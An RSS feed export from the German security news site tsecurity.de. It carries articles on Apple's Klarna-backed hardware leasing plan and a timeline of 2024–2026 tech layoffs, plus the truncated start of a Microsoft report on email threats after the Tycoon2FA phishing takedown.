<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=forced%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Wed, 29 Jul 2026 22:11:51 +0200</lastBuildDate>
<pubDate>Wed, 29 Jul 2026 22:11:51 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=forced%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=forced%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Own nothing, upgrade everything: Apple’s new Klarna deal]]></title>
<description><![CDATA[Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to launch its new deal with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread a...]]></description>
<link>https://tsecurity.de/de/3694772/ai-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694772/ai-nachrichten/own-nothing-upgrade-everything-apples-new-klarna-deal/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:09 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Just in time for the iPhone’s 20th anniversary, Apple is moving closer to becoming a service company. It is set to <a href="https://www.reuters.com/business/apple-launch-upgrade-device-leasing-program-spur-sales-bloomberg-news-reports-2026-07-21/" target="_blank" rel="noreferrer noopener">launch its new deal</a> with Klarna next week and when it does, Apple enthusiasts in the US will effectively be able to subscribe to their favorite Apple hardware, with the cost spread across up to three years.</p>



<p class="wp-block-paragraph">This matters because when combined with Apple One and Apple’s Creator Studio subscriptions, the Klarna arrangement brings Apple closer to offering a full subscription model for hardware, software, and services. The only thing you don’t get under the new arrangement is AppleCare, for which you’ll allegedly need to pay extra.</p>



<h2 class="wp-block-heading"><strong>Moving closer to hardware-as-a-service</strong></h2>



<p class="wp-block-paragraph">Apple has slowly been <a href="https://www.applemust.com/opinion-how-you-will-access-apple-products-in-future/#google_vignette" target="_blank" rel="noreferrer noopener">transitioning toward</a> hardware-as-a-service for almost a decade. Back then, Forrester analyst <a href="https://www.applemust.com/apple-klarna-mean-we-can-now-get-apple-as-a-service/" target="_blank" rel="noreferrer noopener">Frank Gillet predicted</a> the company would eventually offer bundles of services and products for a monthly, all-in, fee. </p>



<p class="wp-block-paragraph">This isn’t quite where we are yet; you still need at least three subscriptions to get close. But, after the better part of a decade, Apple has moved much nearer to the hardware-as-a-service idea.</p>



<p class="wp-block-paragraph">There are some products reportedly excluded from the arrangement, including MacBook Neo, Apple Watch SE, the entry-level iPad, and iPhone 16. Clearly, Apple sees those products as sufficiently affordable. </p>



<h2 class="wp-block-heading"><strong>Easy payments for RAM-ageddon</strong></h2>



<p class="wp-block-paragraph">The new Klarna arrangement comes as Apple is forced to increase product prices as AI-driven memory price inflation becomes widely felt across every economy. In theory, I assume, Apple hopes to make its products available to cash-strapped consumers who need new hardware, while also navigating a time of deep economic tumult and uncertainty. It’s thought the company has <a href="https://www.bloomberg.com/news/newsletters/2025-04-06/will-apple-raise-iphone-prices-in-the-us-after-trump-tariffs-iphone-17-details" target="_blank" rel="noreferrer noopener">previously rejected these plans</a> to protect normal hardware sales, but normality is a kingdom we no longer seem to possess. Interesting times. Probable inflation incoming.</p>



<p class="wp-block-paragraph">“Apple Upgrade lands at precisely the moment Apple needs it,” IDC analyst Francisco Jeronimo wrote in a note seen by <em>Computerworld</em>. “Having just pushed Mac and iPad prices up on the back of the memory shortage, with iPhone increases widely expected in September — as well as the new iPhone foldable expected at $2,500 — Apple’s real risk is that rising prices even further can impact the upgrade cycle.” </p>



<h2 class="wp-block-heading"><strong>New age, new shopping habits</strong></h2>



<p class="wp-block-paragraph">The introduction of the scheme gives consumers a way to purchase the company’s popular high-end devices when they are introduced — no doubt,at higher cost — this fall. Plus, of course, if it’s <a href="https://www.businessinsider.com/general-motors-gm-earnings-subscriptions-revenue-business-2026-1" target="_blank" rel="noreferrer noopener">good enough for GM</a>, it’s good enough for Apple.</p>



<p class="wp-block-paragraph">It’s all about attitude, too. From Apple’s perspective, it <a href="https://www.computerworld.com/article/4125784/are-you-ready-for-apple-as-a-service.html">has done plenty of the groundwork</a> required to <a href="https://www.applemust.com/apple-vp-eddy-cue-shares-15-important-apple-services-stats/" target="_blank" rel="noreferrer noopener">convince its customers</a> that subscription payments for things you value are no bad thing. </p>



<p class="wp-block-paragraph">Reluctance to embrace “Access Not Ownership’”purchasing models has dropped dramatically since Apple — and <a href="https://www.computerworld.com/article/1665439/apples-tim-cook-has-kept-his-50b-services-promises.html">CEO Tim Cook</a> — first began <a href="https://www.applemust.com/apples-50b-services-target-just-isnt-ambitious-enough/">banging the drum</a> for services income. Apple’s services stream has now become its second-biggest revenue driver after the iPhone. It has over 1 billion paid subscriptions, and an active hardware installed base of <a href="https://www.computerworld.com/article/4168225/wwdc-2026-how-apple-can-take-a-great-leap-in-ai.html">more than 2.5 billion devices globally</a>.</p>



<p class="wp-block-paragraph">A combination of changed customer habits and external threat means the stars are now aligned for hardware-as-a-service models. “Reframing a device as a low monthly payment protects that [upgrade] cadence and allows Apple to start marketing their products as device-as-a-service to consumers, which no other vendor was ever able to do,” Jeronimo wrote to me. </p>



<p class="wp-block-paragraph">There is a one-more-thing aspect to this: the products are effectively being leased, a new approach that will give Apple a stronger grip on EOL devices, helping it grab more of them for refurbishment, resale, and recycling. Over time, this will give the company a much stronger grip on the lucrative second-user market that exists around Apple equipment, even while for almost every consumer product we find the life we want is something we can rent, but <a href="https://medium.com/from-heart-to-hand/the-subscription-society-what-happens-when-you-own-nothing-ef32d5bc32d2" target="_blank" rel="noreferrer noopener">probably can’t afford to own</a>.</p>



<h2 class="wp-block-heading"><strong>Managing future risk</strong></h2>



<p class="wp-block-paragraph">The other solid reason to take a partnership approach is risk management. Apple had intended to develop its own buy-now, pay-later scheme via Apple Pay Later, but <a href="https://www.bbc.co.uk/news/articles/c255y82y9x8o" target="_blank" rel="noreferrer noopener">abandoned that plan</a> as it became riskier with rising bank rates. “Also, by backing the program with Klarna rather than reviving the in-house subscription plan it shelved in 2024, Apple captures the demand upside without taking the credit risk onto its own balance sheet,” Jeronimo said.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Tech layoffs: A 2026 timeline]]></title>
<description><![CDATA[Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented ev...]]></description>
<link>https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694770/ai-nachrichten/tech-layoffs-a-2026-timeline/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:08 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Among a range of factors leading to a wave of tech sector layoffs in 2026 is the rapid rise of artificial intelligence and automation. Companies are reconfiguring their workforces to leverage AI for increased efficiency and reduced operating costs. This realignment and reduction is implemented even by companies reporting strong financial performance.</p>



<p class="wp-block-paragraph">But it’s not just AI leading to workforce cuts. Complementing this technological shift are ongoing economic uncertainty, inflation, and higher interest rates, compounded by a chip shortage and rising energy costs. This mix is driving companies to cut costs and streamline operations for increased efficiency.</p>



<p class="wp-block-paragraph">According to data compiled by <a href="https://layoffs.fyi/" target="_blank" rel="noreferrer noopener">Layoffs.fyi</a>, an online tracker that keep tabs on job losses in the technology sector, 123,941 tech employees were laid off at 269 companies in 2025. The site also reports that 71,981 government employees were laid off by DOGE alone, with 182,528 total federal workers laid off.</p>



<p class="wp-block-paragraph">Here is a list — to be updated regularly — of some of the most prominent technology layoffs the industry has experienced recently.</p>



<h2 class="wp-block-heading">Notable tech layoffs in 2026</h2>



<ul class="wp-block-list">
<li>Monday.com</li>



<li>Microsoft</li>



<li>Meta</li>



<li>Cisco</li>



<li>Cloudflare</li>



<li>Oracle</li>



<li>Atlassian </li>



<li>Salesforce</li>



<li>Amazon</li>



<li>Ericsson</li>
</ul>



<h3 class="wp-block-heading">July 22, 2026: Monday.com cuts 20% of its workforce to restructure for the AI era</h3>



<p class="wp-block-paragraph">The company says the decision to <a href="https://www.computerworld.com/article/4200349/monday-com-cuts-20-of-its-workforce-to-restructure-for-the-ai-era-2.html">cut 620 jobs</a> isn’t about margins, but about creating a flatter organization built around AI agents, autonomous teams, and deeper customer engagement.</p>



<h3 class="wp-block-heading">July 6, 2026: Microsoft cuts 4,800 jobs, primarily in sales and Xbox teams</h3>



<p class="wp-block-paragraph">As the company <a href="https://www.computerworld.com/article/4193532/microsoft-bets-that-enterprise-ai-needs-engineers-not-bigger-sales-teams-2.html" target="_blank">trims thousands of jobs</a>, it’s also investing in embedded engineering teams and AI infrastructure. The layoffs come several weeks after the company offered 8,750 US employees <a href="https://www.computerworld.com/article/4163188/microsoft-to-offer-voluntary-retirement-buyouts-to-about-7-of-the-us-workforce.html">voluntary retirement buyouts</a>.</p>



<h3 class="wp-block-heading">June 5, 2026: Tech industry cut 38,242 jobs in May, worst since 2024</h3>



<p class="wp-block-paragraph">AI was blamed for 40% of <a href="https://www.computerworld.com/article/4181822/tech-industry-cut-38242-jobs-in-may-worst-since-2024.html">the job cuts in May</a>, up from 7% in January, according to research by employment placement company Challenger, Gray &amp; Christmas.</p>



<h3 class="wp-block-heading">May 20, 2026: Meta cuts 8,000 jobs, around 10% of workforce</h3>



<p class="wp-block-paragraph">The cuts are expected to expected to hit Meta’s engineering and product teams the hardest, arriving as Meta pivots toward AI to boost efficiency across its organization, <a href="https://tech.yahoo.com/general/article/meta-starts-cutting-8000-jobs-as-part-of-previously-announced-layoffs-145220586.html" target="_blank" rel="noreferrer noopener">according to Yahoo Tech</a>.</p>



<h3 class="wp-block-heading">May 13, 2026: Cisco to cut nearly 4,000 jobs despite strong growth in AI, enterprise networking</h3>



<p class="wp-block-paragraph">Despite reporting positive financial news — including record third-quarter revenue of $15.8 billion, a 12% year-over-year increase — Cisco said it will <a href="https://www.networkworld.com/article/4171043/cisco-to-cut-nearly-4000-jobs-despite-strong-growth-in-ai-enterprise-networking.html" target="_blank">eliminate almost 4,000 jobs</a>.</p>



<h3 class="wp-block-heading">May 7, 2026: Cloudflare to cut 1,100 jobs in AI-focused restructuring</h3>



<p class="wp-block-paragraph">About <a href="https://finance.yahoo.com/markets/stocks/articles/cloudflare-cut-over-1-100-204726989.html" target="_blank" rel="noreferrer noopener">20% of Cloudflare’s global workforce will be culled</a> as the company pivots for the agentic AI era, Reuters reported.</p>



<h3 class="wp-block-heading">April 1, 2026: Oracle to cut up to 30,000 jobs globally, putting enterprise support and roadmaps at risk</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4153113/oracle-cuts-up-to-30000-jobs-globally-putting-enterprise-support-and-roadmaps-at-risk.html">Oracle began laying off employees</a> on March 31 in what could be the largest workforce reduction in the company’s history. Employees received termination emails at 6 a.m. local time with immediate system lockouts and no prior warning. <em>(Note: in June, CNBC put the <a href="https://www.cnbc.com/2026/06/23/oracle-ai-job-cuts-layoffs-21000.html" target="_blank" rel="noreferrer noopener">final layoff tally at 21,000</a>.)</em></p>



<h3 class="wp-block-heading">March 12, 2026: Atlassian cuts 1,600 jobs to fund AI and enterprise expansion</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4144218/atlassian-cuts-1600-jobs-to-fund-ai-and-enterprise-expansion.html">Atlassian will reduce its global workforce</a> by approximately 10%, eliminating around 1,600 roles, as the collaboration software maker redirects capital toward artificial intelligence development and enterprise sales.</p>



<h3 class="wp-block-heading">March 11, 2026: Tech layoffs surpass 45,000 in early 2026</h3>



<p class="wp-block-paragraph">A recent analysis by RationalFX found 45,363 job cuts globally so far this year—with roughly 68% or more than 30,000 occurring in the U.S. — highlighting ongoing <a href="https://www.networkworld.com/article/4143749/tech-layoffs-surpass-45000-in-early-2026.html" target="_blank">workforce cuts even as many tech companies report strong revenue growth</a>.</p>



<h3 class="wp-block-heading">February 10, 2026: Salesforce lays off staffers as executive leadership churn continues</h3>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4130028/salesforce-lays-off-staffers-as-executive-leadership-churn-continues.html" target="_blank">Salesforce has reduced close to 1,000 roles</a> earlier this month across teams, including marketing, product management, data analytics, and its <a href="https://www.cio.com/article/4011936/salesforce-agentforce-3-promises-new-ways-to-monitor-and-manage-ai-agents.html">Agentforce</a> AI unit, <a href="https://www.businessinsider.com/salesforce-cuts-jobs-executive-changes-2026-2">Business Insider</a> reported, quoting employees familiar with the matter.</p>



<h3 class="wp-block-heading">January 23, 2026: Amazon layoffs expected to disproportionately hit AWS and tech talent</h3>



<p class="wp-block-paragraph">As the market slows down, <a href="https://www.computerworld.com/article/4121653/amazon-layoffs-expected-to-disproportionately-hit-aws-and-tech-talent.html">AWS and other Amazon units are preparing for another round of layoffs</a>, which is expected to overwhelmingly impact tech talent. An email from HR leader Beth Galetti on Jan. 28 <a href="https://www.computerworld.com/article/4123477/amazon-confirms-16000-job-cuts-including-to-aws.html">confirmed 16,000 job cuts</a>.</p>



<h3 class="wp-block-heading">January 15, 2026: Ericsson plans to shed 1,600 jobs in Sweden</h3>



<p class="wp-block-paragraph"> Ericsson lans to cut some 1,600 jobs in Sweden, the telecommunications equipment maker said doubling down on recent cost-saving measures that have helped it weather a prolonged downturn in telecoms spending, <a href="https://www.reuters.com/business/world-at-work/ericsson-shed-1600-jobs-sweden-2026-01-15/" target="_blank" rel="noreferrer noopener">Reuters reports</a>.</p>



<h3 class="wp-block-heading">January 13, 2026: Meta plans to cut around 10% of employees in Reality Labs business</h3>



<p class="wp-block-paragraph">Meta plans to cut around 10% of the employees in its Reality Labs division who work on products including the metaverse, according to three people with knowledge of the discussions, <a href="http://meta%20plans%20to%20cut%20around%2010%25%20of%20employees%20in%20reality%20labs%20business/" target="_blank" rel="noreferrer noopener">according to The New York Times</a>.</p>



<h2 class="wp-block-heading">Layoffs in 2025</h2>



<ul class="wp-block-list">
<li>Cisco</li>



<li>Oracle</li>



<li>Windsurf</li>



<li>Intel</li>



<li>Microsoft</li>



<li>Crowdstrike</li>



<li>HPE</li>



<li>Autodesk</li>



<li>HPE</li>



<li>CISA</li>



<li>Workday</li>



<li>Salesforce</li>



<li>Meta</li>
</ul>



<h3 class="wp-block-heading">Global tech-sector layoffs surpass 244,000 in 2025</h3>



<p class="wp-block-paragraph">Economic uncertainty, elevated interest rates, and AI adoption have <a href="https://www.networkworld.com/article/4114572/global-tech-sector-layoffs-surpass-244000-in-2025.html" target="_blank">driven workforce reductions across tech companies worldwide</a>, according to a RationalFX report.</p>



<h3 class="wp-block-heading">October 28, 2025: Amazon to cut 14,000 jobs across company</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4080142/amazon-to-cut-14000-jobs-across-company.html">Amazon will reduce its overall workforce</a> by 14,000, cutting layers of management across the company and hiring in some areas to support its “biggest bets”.</p>



<h3 class="wp-block-heading">August 18, 2025: Cisco and Oracle to cut hundreds of Bay Area jobs</h3>



<p class="wp-block-paragraph">Tech companies Cisco and Oracle are <a href="https://www.sfchronicle.com/tech/article/cisco-oracle-layoffs-bay-area-20824135.php" target="_blank" rel="noreferrer noopener">cutting hundreds of jobs across the Bay Area</a>. Cisco will eliminate 221 positions at its Milpitas and San Francisco offices, effective Oct. 13. Oracle is reducing 101 positions in Santa Clara on the same date </p>



<h3 class="wp-block-heading">August 5, 2025: 3 weeks after acquiring Windsurf, Cognition offers staff the exit door</h3>



<p class="wp-block-paragraph">Cognition, the AI coding startup that acquired rival company Windsurf three weeks ago, laid off 30 employees last week and is offering buyouts to the roughly 200 remaining employees on the team, <a href="https://www.theinformation.com/articles/cognition-offers-buyouts-newly-acquired-windsurf-staff" target="_blank" rel="noreferrer noopener">reports The Information</a>.</p>



<h3 class="wp-block-heading">July 25, 2025, Intel to lay off 22% of workforce, CEO Tan signals ‘no more blank checks’</h3>



<p class="wp-block-paragraph"><a href="https://www.computerworld.com/article/4028896/intel-to-lay-off-22-of-workforce-as-ceo-tan-signals-no-more-blank-checks.html">Intel will reduce its workforce to 75,000 employees</a> by the end of 2025 as new CEO Lip-Bu Tan implements sweeping changes designed to transform the struggling chipmaker</p>



<h3 class="wp-block-heading">July 8, 2025, Intel layoffs begin: Chipmaker is cutting many thousands of jobs</h3>



<p class="wp-block-paragraph">Intel has begun laying off employees across the company. CEO Lip-Bu Tan told workers back in April to expect <a href="https://www.oregonlive.com/silicon-forest/2025/07/intel-layoffs-begin-chipmaker-is-cutting-many-thousands-of-jobs.html">major layoffs at Intel </a>in the coming months as the chipmaker slashes costs and overhauls its organization after years of technical setbacks and falling sales. </p>



<h3 class="wp-block-heading">July 2, 2025: Microsoft will cut 9,000 workers</h3>



<p class="wp-block-paragraph">Microsoft will lay off about 9,000 employees, a source familiar with the workforce cut <a href="https://www.nbcnews.com/business/business-news/microsoft-laying-9000-employees-latest-cuts-rcna216553">told CNBC</a>.  The cuts will reportedly affect less than 4% of Microsoft’s global workforce and will impact different teams, geographies and levels of experience. This is the latest in a string of cuts the tech giant has made this year.</p>



<h3 class="wp-block-heading">June 17, 2025: Intel looks to factory layoffs to return to profitability</h3>



<p class="wp-block-paragraph"><a href="https://www.networkworld.com/article/4008670/can-intel-cut-its-way-to-profit-with-factory-layoffs.html">Intel will lay off up to 20% of its manufacturing sector employees</a> starting in July,  according to media reports, as the company looks for options as it seeks a return to profitability. The cuts reportedly will be made around the world, but some of the layoffs will be closer to home, according to a report in The Oregonian citing an internal company memo from Intel manufacturing Vice President Naga Chandrasekaran.</p>



<h3 class="wp-block-heading">May 7, 2025: CrowdStrike to lay off 5% of staff</h3>



<p class="wp-block-paragraph"><a href="https://www.reuters.com/sustainability/crowdstrike-lay-off-5-staff-reaffirms-forecasts-2025-05-07/">CrowdStrike announced a plan to cut about 500 roles</a>, roughly 5% of its workforce, to streamline operations and reduce costs. The cybersecurity company will incur about $36 million to $53 million in charges related to the layoffs</p>



<h3 class="wp-block-heading">March 6, 2025: HPE cuts 2,500 jobs, remains committed to Juniper buy</h3>



<p class="wp-block-paragraph">CEO Antonio Neri told Wall Street analysts that <a href="https://www.networkworld.com/article/3840596/hpe-cuts-2500-workers-expects-juniper-buy-to-close-end-of-25-faces-tariff-issues.html">HPE would begin implementing a cost-cutting program involving layoffs </a>of about 2,500 employees over the next 18 months. HPE employs about 61,000 people worldwide.</p>



<h3 class="wp-block-heading">Feb. 27, 2025: Autodesk to lay off 9% of workforce</h3>



<p class="wp-block-paragraph">Software maker Autodesk is laying off 1,350 staff. With the rise of subscription and multi-year contracts billed annually, and self-service enablement, it finds it needs fewer sales staff, <a href="https://adsknews.autodesk.com/en/news/022725-employee-message/">CEO Andrew Anagnost said in a message to employees</a>. And with its cloud, platform, and AI products proving most profitable, it’s concentrating its staff and investments there. </p>



<h3 class="wp-block-heading">Feb. 27, 2025: HP to lay off 2,000 more</h3>



<p class="wp-block-paragraph">As part of an ongoing restructuring, HP plans to lay off up to another 2,000 workers. In recent weeks, the company has tried — unsuccessfully — to do away with telephone support staff by <a href="https://www.pcworld.com/article/2617767/hp-forced-callers-to-wait-15-minutes-before-connecting-to-support-staff.html">forcing callers to wait for at least 15 minutes</a> if they refuse to use self-service support resources online. The company swiftly backtracked, but wider job cuts are still on. </p>



<h3 class="wp-block-heading">Feb. 21, 2025: <a href="https://www.csoonline.com/article/3829710/firing-of-130-cisa-staff-worries-cybersecurity-industry.html">CISA lays off 130</a></h3>



<p class="wp-block-paragraph">Government employees get laid off too: In this case, 130 workers at the US Cybersecurity and Infrastructure Security Agency are being shown the door as a result of a DOGE decision. Cybersecurity experts are concerned that the cuts will harm the international collaborations that CISA has fostered, quite apart from their concerns about the security of the DOGE layoff process itself.</p>



<h3 class="wp-block-heading">Feb. 5, 2025: <a href="https://www.computerworld.com/article/3817887/workday-to-cut-1750-jobs-shift-focus-to-ai-and-global-expansion.html">Workday lays off 1,750</a></h3>



<p class="wp-block-paragraph">As it moves to invest more in AI and international growth, Workday is laying off 8.5% of its workforce and disposing of unused office space. Some analysts fear the cutbacks will affect the company’s customer service — unless AI can pick up the slack.</p>



<h3 class="wp-block-heading">Feb. 4, 2025: Salesforce lays off over 1,000</h3>



<p class="wp-block-paragraph">At the same time as it’s hiring sales staff for its new artificial intelligence products, Salesforce is laying off over 1,000 workers across the company, according to Bloomberg. As of June, 2024, the company had over 72,000 employees, according to its website. Salesforce did not comment on the report. In 2024 the company reportedly laid off around 1,000 staff too, in two waves: January and July.</p>



<h3 class="wp-block-heading">Jan. 14, 2025: Meta will lay off 5% of workforce</h3>



<p class="wp-block-paragraph">Mark Zuckerberg told Meta employees he intended to “move out the low performers faster” in an internal memo reported by Bloomberg. The memo announced that the company will lay off 5% of its staff, or around 3,600 staff, beginning Feb. 10. The company had already reduced its headcount by 5% in 2024 through natural attrition, the memo said. Among those leaving the company will be staff previously responsible for fact checking of posts on its social media platforms in the US, as the company begins relying on its users to police content.</p>



<h2 class="wp-block-heading">Tech layoffs in 2024</h2>



<ul class="wp-block-list">
<li>Equinix</li>



<li>AMD</li>



<li>Freshworks</li>



<li>Cisco</li>



<li>General Motors</li>



<li>Intel</li>



<li>OpenText</li>



<li>Microsoft</li>



<li>AWS</li>



<li>Dell</li>
</ul>



<h3 class="wp-block-heading">Nov. 26, 2024: <a href="https://www.networkworld.com/article/3613399/equinix-to-cut-3-of-staff-amidst-the-greatest-demand-for-data-center-infrastructure-ever.html">Equinix to cut 3% of staff</a></h3>



<p class="wp-block-paragraph">Despite intense demand for its data center capacity, Equinix is planning to lay off 3% of its workforce, or around 400 employees. The announcement followed the appointment of Adaire Fox-Martin to replace Charles Meyers as CEO and the departures of two other senior executives, CIO Milind Wagle and CISO Michael Montoya.</p>



<h3 class="wp-block-heading">Nov. 13, 2024: <a href="https://www.networkworld.com/article/3605016/amd-to-cut-4-of-workforce-to-prioritize-ai-chip-expansion-to-rival-nvidia.html#:~:text=Workforce%20reduction%20comes%20amid%20strong,shift%20in%20focus%20toward%20AI.&amp;text=Advanced%20Micro%20Devices%20(AMD)%20is,Nvidia's%20lead%20in%20the%20sector.">AMD to cut 4% of workforce</a></h3>



<p class="wp-block-paragraph">AMD will lay off around 1,000 employees as it pivots towards developing AI-focused chips, it said. The move came as a surprise to staff, as the company also reported strong quarterly earnings. </p>



<h3 class="wp-block-heading">Nov. 7, 2024: <a href="https://www.cio.com/article/3601088/freshworks-lays-off-660-about-13-percent-of-its-global-workforce-despite-strong-earnings-profits.html">Freshworks lays off 660</a></h3>



<p class="wp-block-paragraph">Enterprise software vendor Freshworks laid off around 660 staff, or around 13% of its headcount, despite reporting increased revenue and profits in its fourth fiscal quarter. The company described the layoffs as a realignment of its global workforce.</p>



<h3 class="wp-block-heading">Sept. 17, 2024: <a href="https://www.networkworld.com/article/3486901/cisco-to-cut-7-of-workforce-restructure-product-groups.html">Cisco lays off 6,000</a></h3>



<p class="wp-block-paragraph">After laying off around 4,200 staff in February, Cisco is at it again, laying off another 6,000 or around 7% of its workforce. Among the divisions affected were its threat intelligence unit, Talos Security. </p>



<h3 class="wp-block-heading">Aug. 20, 2024: <a href="https://www.cio.com/article/3489323/gm-software-layoffs-could-signal-a-shift-in-digital-transformation-strategy.html">General Motors lays off 1,000 software staff</a></h3>



<p class="wp-block-paragraph">More than 1,000 software and services staff are on the way out at General Motors, signalling that it could be rethinking its digital transformation strategy. In an internal memo, the company said that it was moving resources to its highest-priority work and flattening hierarchies.</p>



<h3 class="wp-block-heading">August 1, 2024: <a href="https://www.computerworld.com/article/3480715/intel-fires-15000-employees-as-it-intensifies-focus-on-ai.html">Intel removes 15,000 roles</a></h3>



<p class="wp-block-paragraph">Intel plans to cut its workforce by around 15% to reduce costs after a disastrous second quarter. Revenue for the three months to June 29 stagnated at around $12.8 billion, but net income fell 85% to $83 million, prompting CEO Pat Gelsinger to bring forward a company-wide meeting in order to announce that 15,000 staff would lose their jobs. “This is an incredibly hard day for Intel as we are making some of the most consequential changes in our company’s history,” Gelsinger wrote in an email to staff, continuing: “Our revenues have not grown as expected — and we’ve yet to fully benefit from powerful trends, like AI. Our costs are too high, our margins are too low. We need bolder actions to address both — particularly given our financial results and outlook for the second half of 2024, which is tougher than previously expected.”</p>



<h3 class="wp-block-heading">July 4, 2024: <a href="https://www.computerworld.es/article/2513686/opentext-despedira-a-cerca-de-1-200-empleados.html">OpenText to lay off 1,200</a></h3>



<p class="wp-block-paragraph">OpenText said it will lay off 1,200 staff, or about 1.7% of its workforce, in a bid to save around $100 million annually. It plans to hire new sales and engineering staff in other areas in 2025, it said.</p>



<h3 class="wp-block-heading">June 4, 2024: <a href="https://www.networkworld.com/article/2138075/microsoft-lays-off-staffers-from-its-azure-division.html">Microsoft lays off staff in Azure division</a></h3>



<p class="wp-block-paragraph">Microsoft laid off staff in several teams supporting its cloud services, including Azure for Operations and Mission Engineering. The company didn’t say exactly how many staff were leaving.</p>



<h3 class="wp-block-heading">April 4, 2024: <a href="https://www.cio.com/article/2081437/amazon-downsizes-aws-in-a-fresh-cost-cutting-round.html">Amazon downsizes AWS</a> in a fresh cost-cutting round</h3>



<p class="wp-block-paragraph">Amazon announced hundreds of layoffs in the sales and marketing teams of its AWS cloud services division — and also in the technology development teams for its physical retail stores, as it stepped back from efforts to generalize the “<a href="https://www.cio.com/article/2079910/amazon-drops-just-walk-out-technology-at-its-us-retail-locations.html">Just Walk Out</a>” technology built for its Amazon Fresh grocery stores. </p>



<h3 class="wp-block-heading">April 1, 2024: <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">Dell acknowledges 13,000 job cuts</a></h3>



<p class="wp-block-paragraph">Dell Technologies’ <a href="https://investors.delltechnologies.com/static-files/d6e82f58-d417-422f-b2f3-4d08d498abd4" target="_blank" rel="noreferrer noopener">latest 10K filing with the US Securities and Exchange Commission</a> disclosed that the company had laid off 13,000 employees over the course of the 2023 fiscal year; it characterized the layoffs and other reorganizational moves as cost-cutting measures. “These actions resulted in a reduction in our overall headcount,” the company said. A comparison to the previous year’s 10K filing, performed by The Register, found that Dell employed 133,000 people at that point, compared to 120,000 as of February 2024. Dell announced layoffs of 6,650 staffers on Feb. 6, but it is unclear whether those cuts were reflected in the numbers from this year’s 10K statement.</p>



<p class="wp-block-paragraph"><em><a href="https://www.computerworld.com/article/3816662/tech-layoffs-in-2024-a-timeline.html">See news of earlier layoffs.</a></em></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Email threats changed after the Tycoon2FA take-down]]></title>
<description><![CDATA[Traditional phishing techniques are in decline as a result of the disruption of the Tycoon2FA phishing-as-a-service (PHaaS) platform, Microsoft said in a new report, “Email threat landscape: Q2 2026 trends and insights”.



“Phishing volume linked to the platform fell 92% from pre-disruption aver...]]></description>
<link>https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694766/ai-nachrichten/email-threats-changed-after-the-tycoon2fa-take-down/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:06 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
